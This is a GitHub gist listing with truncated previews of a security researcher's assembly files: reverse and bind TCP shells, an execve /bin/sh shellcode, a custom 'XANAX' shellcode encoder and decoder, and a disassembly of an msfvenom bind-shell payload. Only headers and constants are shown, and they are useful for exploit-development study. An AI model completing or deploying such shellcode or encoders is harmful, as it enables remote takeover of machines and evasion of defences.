View GitHub Profile
alanvivona
/ reverse-tcp-auth-shell-ARMv6.s
Last active
April 24, 2019 22:00
A Password-Protected TCP Reverse Shell for Linux/ARM (32-bit ARMv6 - Works on the Raspberry Pi 1)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Password-Protected Reverse Shell Linux/ARMv6 | |
| // Author: Alan Vivona | |
| // medium.syscall59.com | |
| // @syscall59 | |
| .section .text | |
| .global _start | |
| _start: | |
| .arm |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| global _start | |
| section .text | |
| syscalls.access equ 0x15 | |
| EFAULT.lowerbyte equ 0xf2 | |
| egg_plus_one equ 0x90909091 | |
| _start: |
alanvivona
/ xanax-custom-encoder.nasm
Created
March 18, 2019 18:58
XANAX : A custom shellcode encoder written in assembly
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| global _start | |
| segment .data | |
| keys.xor1 equ 0x29 | |
| keys.add1 equ 0xff | |
| keys.xor2 equ 0x50 | |
| keys.add2 equ 0x05 | |
| payload.len equ 74 ; this can't be over 127 bytes otherwise it will produce nullbytes |
alanvivona
/ simple-execve-shellcode.nasm
Created
March 17, 2019 20:20
A simple execve shellcode example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; EXECVE | |
| ; RDX = 0x00 | |
| ; RSI = 0x00 | |
| ; RDI = address of '//bin/sh', 0x00 (the extra slash is just for rounding to 8 bytes) | |
| section .text | |
| global _start | |
| _start: |
alanvivona
/ reverse-tcp-auth-shell.nasm
Last active
January 30, 2020 11:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; ================================================= | |
| ; Password protected x64 TCP Reverse Shell | |
| ; Author: Alan Vivona | |
| ; ================================================= | |
| global _start | |
| ; Syscall numbers | |
| syscalls.socket equ 0x29 | |
| syscalls.bind equ 0x31 |
alanvivona
/ tcp-bind-shell-auth.v2.nasm
Last active
July 27, 2019 07:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; ================================================= | |
| ; TCP Bind Shell with Auth | |
| ; ================================================= | |
| global _start | |
| ; Syscall numbers | |
| syscalls.socket equ 0x29 | |
| syscalls.bind equ 0x31 | |
| syscalls.listen equ 0x32 |
alanvivona
/ tcp-bind-shell.nasm
Last active
March 2, 2019 22:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; ================================================= | |
| ; TCP Bind Shell | |
| ; ================================================= | |
| global _start | |
| ; Syscall numbers | |
| syscalls.socket equ 0x29 | |
| syscalls.bind equ 0x31 | |
| syscalls.listen equ 0x32 |
alanvivona
/ xanax-decoder.nasm
Created
March 2, 2019 19:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| global _start | |
| section .text | |
| keys.xor1 equ 0x29 | |
| keys.add1 equ 0xff | |
| keys.xor2 equ 0x50 | |
| keys.add2 equ 0x05 | |
| ; xanax encoded payload |
alanvivona
/ xanax-encoder.nasm
Last active
March 2, 2019 19:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| global _start | |
| segment .data | |
| keys.xor1 equ 0x29 | |
| keys.add1 equ 0xff | |
| keys.xor2 equ 0x50 | |
| keys.add2 equ 0x05 | |
| payload.len equ 74 ; this can't be over 127 bytes otherwise it will produce nullbytes |
alanvivona
/ msfvenom-shell_bind_tcp_random_port.r2out
Created
February 22, 2019 21:27
radare2 pd output for msfvenom: linux/x64/shell_bind_tcp_random_port
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0x00 4831f6 xor rsi, rsi | |
| 0x03 48f7e6 mul rsi | |
| 0x06 ffc6 inc esi | |
| 0x08 6a02 push 2 ; 2 | |
| 0x0a 5f pop rdi | |
| 0x0b b029 mov al, 0x29 ; ')' ; 41 | |
| 0x0d 0f05 syscall |
NewerOlder